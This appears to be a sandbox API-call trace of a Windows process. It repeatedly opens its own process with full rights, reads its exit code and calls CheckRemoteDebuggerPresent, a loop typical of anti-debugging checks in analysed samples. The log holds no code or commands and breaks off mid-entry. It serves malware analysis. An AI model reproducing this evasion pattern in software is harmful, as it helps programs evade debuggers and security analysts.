[0175.215] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x344 [0175.215] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x2264c8c | out: lpExitCode=0x2264c8c*=0x103) returned 1 [0175.215] CheckRemoteDebuggerPresent (in: hProcess=0x344, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.215] GetCurrentProcessId () returned 0x678 [0175.215] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x348 [0175.215] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x2264d44 | out: lpExitCode=0x2264d44*=0x103) returned 1 [0175.215] CheckRemoteDebuggerPresent (in: hProcess=0x348, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.215] GetCurrentProcessId () returned 0x678 [0175.215] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x358 [0175.215] GetExitCodeProcess (in: hProcess=0x358, lpExitCode=0x2264dfc | out: lpExitCode=0x2264dfc*=0x103) returned 1 [0175.215] CheckRemoteDebuggerPresent (in: hProcess=0x358, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.215] GetCurrentProcessId () returned 0x678 [0175.215] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x354 [0175.216] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x2264eb4 | out: lpExitCode=0x2264eb4*=0x103) returned 1 [0175.216] CheckRemoteDebuggerPresent (in: hProcess=0x354, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.216] GetCurrentProcessId () returned 0x678 [0175.216] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x35c [0175.216] GetExitCodeProcess (in: hProcess=0x35c, lpExitCode=0x2264f6c | out: lpExitCode=0x2264f6c*=0x103) returned 1 [0175.216] CheckRemoteDebuggerPresent (in: hProcess=0x35c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.216] GetCurrentProcessId () returned 0x678 [0175.216] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x360 [0175.216] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x2265024 | out: lpExitCode=0x2265024*=0x103) returned 1 [0175.216] CheckRemoteDebuggerPresent (in: hProcess=0x360, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.216] GetCurrentProcessId () returned 0x678 [0175.216] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x364 [0175.216] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x22650dc | out: lpExitCode=0x22650dc*=0x103) returned 1 [0175.216] CheckRemoteDebuggerPresent (in: hProcess=0x364, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.216] GetCurrentProcessId () returned 0x678 [0175.216] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x368 [0175.216] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x2265194 | out: lpExitCode=0x2265194*=0x103) returned 1 [0175.217] CheckRemoteDebuggerPresent (in: hProcess=0x368, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.217] GetCurrentProcessId () returned 0x678 [0175.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x36c [0175.217] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x226524c | out: lpExitCode=0x226524c*=0x103) returned 1 [0175.217] CheckRemoteDebuggerPresent (in: hProcess=0x36c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.217] GetCurrentProcessId () returned 0x678 [0175.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x370 [0175.217] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x2265304 | out: lpExitCode=0x2265304*=0x103) returned 1 [0175.217] CheckRemoteDebuggerPresent (in: hProcess=0x370, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.217] GetCurrentProcessId () returned 0x678 [0175.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x374 [0175.217] GetExitCodeProcess (in: hProcess=0x374, lpExitCode=0x22653bc | out: lpExitCode=0x22653bc*=0x103) returned 1 [0175.217] CheckRemoteDebuggerPresent (in: hProcess=0x374, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.217] GetCurrentProcessId () returned 0x678 [0175.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x378 [0175.217] GetExitCodeProcess (in: hProcess=0x378, lpExitCode=0x2265474 | out: lpExitCode=0x2265474*=0x103) returned 1 [0175.218] CheckRemoteDebuggerPresent (in: hProcess=0x378, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.218] GetCurrentProcessId () returned 0x678 [0175.218] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x37c [0175.218] GetExitCodeProcess (in: hProcess=0x37c, lpExitCode=0x226552c | out: lpExitCode=0x226552c*=0x103) returned 1 [0175.218] CheckRemoteDebuggerPresent (in: hProcess=0x37c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.218] GetCurrentProcessId () returned 0x678 [0175.218] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x380 [0175.218] GetExitCodeProcess (in: hProcess=0x380, lpExitCode=0x22655e4 | out: lpExitCode=0x22655e4*=0x103) returned 1 [0175.218] CheckRemoteDebuggerPresent (in: hProcess=0x380, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.218] GetCurrentProcessId () returned 0x678 [0175.218] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x384 [0175.218] GetExitCodeProcess (in: hProcess=0x384, lpExitCode=0x226569c | out: lpExitCode=0x226569c*=0x103) returned 1 [0175.218] CheckRemoteDebuggerPresent (in: hProcess=0x384, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.218] GetCurrentProcessId () returned 0x678 [0175.218] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x388 [0175.218] GetExitCodeProcess (in: hProcess=0x388, lpExitCode=0x2265754 | out: lpExitCode=0x2265754*=0x103) returned 1 [0175.218] CheckRemoteDebuggerPresent (in: hProcess=0x388, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.219] GetCurrentProcessId () returned 0x678 [0175.219] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x38c [0175.219] GetExitCodeProcess (in: hProcess=0x38c, lpExitCode=0x226580c | out: lpExitCode=0x226580c*=0x103) returned 1 [0175.219] CheckRemoteDebuggerPresent (in: hProcess=0x38c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.219] GetCurrentProcessId () returned 0x678 [0175.219] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x390 [0175.219] GetExitCodeProcess (in: hProcess=0x390, lpExitCode=0x22658c4 | out: lpExitCode=0x22658c4*=0x103) returned 1 [0175.219] CheckRemoteDebuggerPresent (in: hProcess=0x390, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.219] GetCurrentProcessId () returned 0x678 [0175.219] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x394 [0175.219] GetExitCodeProcess (in: hProcess=0x394, lpExitCode=0x226597c | out: lpExitCode=0x226597c*=0x103) returned 1 [0175.219] CheckRemoteDebuggerPresent (in: hProcess=0x394, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.219] GetCurrentProcessId () returned 0x678 [0175.219] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x398 [0175.220] GetExitCodeProcess (in: hProcess=0x398, lpExitCode=0x2265a34 | out: lpExitCode=0x2265a34*=0x103) returned 1 [0175.220] CheckRemoteDebuggerPresent (in: hProcess=0x398, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.220] GetCurrentProcessId () returned 0x678 [0175.220] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x39c [0175.220] GetExitCodeProcess (in: hProcess=0x39c, lpExitCode=0x2265aec | out: lpExitCode=0x2265aec*=0x103) returned 1 [0175.220] CheckRemoteDebuggerPresent (in: hProcess=0x39c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.220] GetCurrentProcessId () returned 0x678 [0175.220] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3a0 [0175.220] GetExitCodeProcess (in: hProcess=0x3a0, lpExitCode=0x2265ba4 | out: lpExitCode=0x2265ba4*=0x103) returned 1 [0175.220] CheckRemoteDebuggerPresent (in: hProcess=0x3a0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.220] GetCurrentProcessId () returned 0x678 [0175.220] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3a4 [0175.220] GetExitCodeProcess (in: hProcess=0x3a4, lpExitCode=0x2265c5c | out: lpExitCode=0x2265c5c*=0x103) returned 1 [0175.220] CheckRemoteDebuggerPresent (in: hProcess=0x3a4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.221] GetCurrentProcessId () returned 0x678 [0175.221] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3a8 [0175.221] GetExitCodeProcess (in: hProcess=0x3a8, lpExitCode=0x2265d14 | out: lpExitCode=0x2265d14*=0x103) returned 1 [0175.221] CheckRemoteDebuggerPresent (in: hProcess=0x3a8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.221] GetCurrentProcessId () returned 0x678 [0175.221] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3ac [0175.221] GetExitCodeProcess (in: hProcess=0x3ac, lpExitCode=0x2265dcc | out: lpExitCode=0x2265dcc*=0x103) returned 1 [0175.221] CheckRemoteDebuggerPresent (in: hProcess=0x3ac, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.221] GetCurrentProcessId () returned 0x678 [0175.221] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3b0 [0175.221] GetExitCodeProcess (in: hProcess=0x3b0, lpExitCode=0x2265e84 | out: lpExitCode=0x2265e84*=0x103) returned 1 [0175.221] CheckRemoteDebuggerPresent (in: hProcess=0x3b0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.221] GetCurrentProcessId () returned 0x678 [0175.221] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3b4 [0175.221] GetExitCodeProcess (in: hProcess=0x3b4, lpExitCode=0x2265f3c | out: lpExitCode=0x2265f3c*=0x103) returned 1 [0175.221] CheckRemoteDebuggerPresent (in: hProcess=0x3b4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.221] GetCurrentProcessId () returned 0x678 [0175.222] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3b8 [0175.222] GetExitCodeProcess (in: hProcess=0x3b8, lpExitCode=0x2265ff4 | out: lpExitCode=0x2265ff4*=0x103) returned 1 [0175.222] CheckRemoteDebuggerPresent (in: hProcess=0x3b8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.222] GetCurrentProcessId () returned 0x678 [0175.222] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3bc [0175.222] GetExitCodeProcess (in: hProcess=0x3bc, lpExitCode=0x22660ac | out: lpExitCode=0x22660ac*=0x103) returned 1 [0175.222] CheckRemoteDebuggerPresent (in: hProcess=0x3bc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.222] GetCurrentProcessId () returned 0x678 [0175.222] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3c0 [0175.222] GetExitCodeProcess (in: hProcess=0x3c0, lpExitCode=0x2266164 | out: lpExitCode=0x2266164*=0x103) returned 1 [0175.222] CheckRemoteDebuggerPresent (in: hProcess=0x3c0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.222] GetCurrentProcessId () returned 0x678 [0175.222] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3c4 [0175.222] GetExitCodeProcess (in: hProcess=0x3c4, lpExitCode=0x226621c | out: lpExitCode=0x226621c*=0x103) returned 1 [0175.222] CheckRemoteDebuggerPresent (in: hProcess=0x3c4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.222] GetCurrentProcessId () returned 0x678 [0175.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3c8 [0175.223] GetExitCodeProcess (in: hProcess=0x3c8, lpExitCode=0x22662d4 | out: lpExitCode=0x22662d4*=0x103) returned 1 [0175.223] CheckRemoteDebuggerPresent (in: hProcess=0x3c8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.223] GetCurrentProcessId () returned 0x678 [0175.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3cc [0175.223] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x226638c | out: lpExitCode=0x226638c*=0x103) returned 1 [0175.223] CheckRemoteDebuggerPresent (in: hProcess=0x3cc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.223] GetCurrentProcessId () returned 0x678 [0175.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3d0 [0175.223] GetExitCodeProcess (in: hProcess=0x3d0, lpExitCode=0x2266444 | out: lpExitCode=0x2266444*=0x103) returned 1 [0175.223] CheckRemoteDebuggerPresent (in: hProcess=0x3d0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.223] GetCurrentProcessId () returned 0x678 [0175.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3d4 [0175.223] GetExitCodeProcess (in: hProcess=0x3d4, lpExitCode=0x22664fc | out: lpExitCode=0x22664fc*=0x103) returned 1 [0175.223] CheckRemoteDebuggerPresent (in: hProcess=0x3d4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.223] GetCurrentProcessId () returned 0x678 [0175.224] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3d8 [0175.224] GetExitCodeProcess (in: hProcess=0x3d8, lpExitCode=0x22665b4 | out: lpExitCode=0x22665b4*=0x103) returned 1 [0175.224] CheckRemoteDebuggerPresent (in: hProcess=0x3d8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.224] GetCurrentProcessId () returned 0x678 [0175.224] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3dc [0175.224] GetExitCodeProcess (in: hProcess=0x3dc, lpExitCode=0x226666c | out: lpExitCode=0x226666c*=0x103) returned 1 [0175.224] CheckRemoteDebuggerPresent (in: hProcess=0x3dc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.224] GetCurrentProcessId () returned 0x678 [0175.224] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3e0 [0175.224] GetExitCodeProcess (in: hProcess=0x3e0, lpExitCode=0x2266724 | out: lpExitCode=0x2266724*=0x103) returned 1 [0175.224] CheckRemoteDebuggerPresent (in: hProcess=0x3e0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.224] GetCurrentProcessId () returned 0x678 [0175.224] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3e4 [0175.224] GetExitCodeProcess (in: hProcess=0x3e4, lpExitCode=0x22667dc | out: lpExitCode=0x22667dc*=0x103) returned 1 [0175.224] CheckRemoteDebuggerPresent (in: hProcess=0x3e4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.224] GetCurrentProcessId () returned 0x678 [0175.225] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3e8 [0175.225] GetExitCodeProcess (in: hProcess=0x3e8, lpExitCode=0x2266894 | out: lpExitCode=0x2266894*=0x103) returned 1 [0175.225] CheckRemoteDebuggerPresent (in: hProcess=0x3e8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.225] GetCurrentProcessId () returned 0x678 [0175.225] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3ec [0175.225] GetExitCodeProcess (in: hProcess=0x3ec, lpExitCode=0x226694c | out: lpExitCode=0x226694c*=0x103) returned 1 [0175.225] CheckRemoteDebuggerPresent (in: hProcess=0x3ec, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.225] GetCurrentProcessId () returned 0x678 [0175.225] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3f0 [0175.225] GetExitCodeProcess (in: hProcess=0x3f0, lpExitCode=0x2266a04 | out: lpExitCode=0x2266a04*=0x103) returned 1 [0175.225] CheckRemoteDebuggerPresent (in: hProcess=0x3f0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.225] GetCurrentProcessId () returned 0x678 [0175.225] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3f4 [0175.225] GetExitCodeProcess (in: hProcess=0x3f4, lpExitCode=0x2266abc | out: lpExitCode=0x2266abc*=0x103) returned 1 [0175.225] CheckRemoteDebuggerPresent (in: hProcess=0x3f4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.225] GetCurrentProcessId () returned 0x678 [0175.226] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3f8 [0175.226] GetExitCodeProcess (in: hProcess=0x3f8, lpExitCode=0x2266b74 | out: lpExitCode=0x2266b74*=0x103) returned 1 [0175.226] CheckRemoteDebuggerPresent (in: hProcess=0x3f8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.226] GetCurrentProcessId () returned 0x678 [0175.226] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x3fc [0175.226] GetExitCodeProcess (in: hProcess=0x3fc, lpExitCode=0x2266c2c | out: lpExitCode=0x2266c2c*=0x103) returned 1 [0175.226] CheckRemoteDebuggerPresent (in: hProcess=0x3fc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.226] GetCurrentProcessId () returned 0x678 [0175.226] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x404 [0175.226] GetExitCodeProcess (in: hProcess=0x404, lpExitCode=0x2266ce4 | out: lpExitCode=0x2266ce4*=0x103) returned 1 [0175.226] CheckRemoteDebuggerPresent (in: hProcess=0x404, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.226] GetCurrentProcessId () returned 0x678 [0175.226] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x408 [0175.226] GetExitCodeProcess (in: hProcess=0x408, lpExitCode=0x2266d9c | out: lpExitCode=0x2266d9c*=0x103) returned 1 [0175.226] CheckRemoteDebuggerPresent (in: hProcess=0x408, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.227] GetCurrentProcessId () returned 0x678 [0175.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x40c [0175.227] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x2266e54 | out: lpExitCode=0x2266e54*=0x103) returned 1 [0175.227] CheckRemoteDebuggerPresent (in: hProcess=0x40c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.227] GetCurrentProcessId () returned 0x678 [0175.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x410 [0175.227] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x2266f0c | out: lpExitCode=0x2266f0c*=0x103) returned 1 [0175.227] CheckRemoteDebuggerPresent (in: hProcess=0x410, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.227] GetCurrentProcessId () returned 0x678 [0175.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x414 [0175.227] GetExitCodeProcess (in: hProcess=0x414, lpExitCode=0x2266fc4 | out: lpExitCode=0x2266fc4*=0x103) returned 1 [0175.227] CheckRemoteDebuggerPresent (in: hProcess=0x414, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.227] GetCurrentProcessId () returned 0x678 [0175.227] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x418 [0175.227] GetExitCodeProcess (in: hProcess=0x418, lpExitCode=0x226707c | out: lpExitCode=0x226707c*=0x103) returned 1 [0175.227] CheckRemoteDebuggerPresent (in: hProcess=0x418, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.228] GetCurrentProcessId () returned 0x678 [0175.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x41c [0175.228] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x2267134 | out: lpExitCode=0x2267134*=0x103) returned 1 [0175.228] CheckRemoteDebuggerPresent (in: hProcess=0x41c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.228] GetCurrentProcessId () returned 0x678 [0175.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x420 [0175.228] GetExitCodeProcess (in: hProcess=0x420, lpExitCode=0x22671ec | out: lpExitCode=0x22671ec*=0x103) returned 1 [0175.228] CheckRemoteDebuggerPresent (in: hProcess=0x420, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.228] GetCurrentProcessId () returned 0x678 [0175.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x424 [0175.228] GetExitCodeProcess (in: hProcess=0x424, lpExitCode=0x22672a4 | out: lpExitCode=0x22672a4*=0x103) returned 1 [0175.228] CheckRemoteDebuggerPresent (in: hProcess=0x424, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.228] GetCurrentProcessId () returned 0x678 [0175.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x428 [0175.228] GetExitCodeProcess (in: hProcess=0x428, lpExitCode=0x226735c | out: lpExitCode=0x226735c*=0x103) returned 1 [0175.228] CheckRemoteDebuggerPresent (in: hProcess=0x428, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.228] GetCurrentProcessId () returned 0x678 [0175.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x42c [0175.229] GetExitCodeProcess (in: hProcess=0x42c, lpExitCode=0x2267414 | out: lpExitCode=0x2267414*=0x103) returned 1 [0175.229] CheckRemoteDebuggerPresent (in: hProcess=0x42c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.229] GetCurrentProcessId () returned 0x678 [0175.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x430 [0175.229] GetExitCodeProcess (in: hProcess=0x430, lpExitCode=0x22674cc | out: lpExitCode=0x22674cc*=0x103) returned 1 [0175.229] CheckRemoteDebuggerPresent (in: hProcess=0x430, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.229] GetCurrentProcessId () returned 0x678 [0175.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x434 [0175.229] GetExitCodeProcess (in: hProcess=0x434, lpExitCode=0x2267584 | out: lpExitCode=0x2267584*=0x103) returned 1 [0175.229] CheckRemoteDebuggerPresent (in: hProcess=0x434, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.229] GetCurrentProcessId () returned 0x678 [0175.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x438 [0175.229] GetExitCodeProcess (in: hProcess=0x438, lpExitCode=0x226763c | out: lpExitCode=0x226763c*=0x103) returned 1 [0175.229] CheckRemoteDebuggerPresent (in: hProcess=0x438, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.230] GetCurrentProcessId () returned 0x678 [0175.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x43c [0175.230] GetExitCodeProcess (in: hProcess=0x43c, lpExitCode=0x22676f4 | out: lpExitCode=0x22676f4*=0x103) returned 1 [0175.230] CheckRemoteDebuggerPresent (in: hProcess=0x43c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.230] GetCurrentProcessId () returned 0x678 [0175.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x440 [0175.230] GetExitCodeProcess (in: hProcess=0x440, lpExitCode=0x22677ac | out: lpExitCode=0x22677ac*=0x103) returned 1 [0175.230] CheckRemoteDebuggerPresent (in: hProcess=0x440, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.230] GetCurrentProcessId () returned 0x678 [0175.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x444 [0175.230] GetExitCodeProcess (in: hProcess=0x444, lpExitCode=0x2267864 | out: lpExitCode=0x2267864*=0x103) returned 1 [0175.230] CheckRemoteDebuggerPresent (in: hProcess=0x444, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.230] GetCurrentProcessId () returned 0x678 [0175.230] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x448 [0175.230] GetExitCodeProcess (in: hProcess=0x448, lpExitCode=0x226791c | out: lpExitCode=0x226791c*=0x103) returned 1 [0175.231] CheckRemoteDebuggerPresent (in: hProcess=0x448, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.231] GetCurrentProcessId () returned 0x678 [0175.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x44c [0175.231] GetExitCodeProcess (in: hProcess=0x44c, lpExitCode=0x22679d4 | out: lpExitCode=0x22679d4*=0x103) returned 1 [0175.231] CheckRemoteDebuggerPresent (in: hProcess=0x44c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.231] 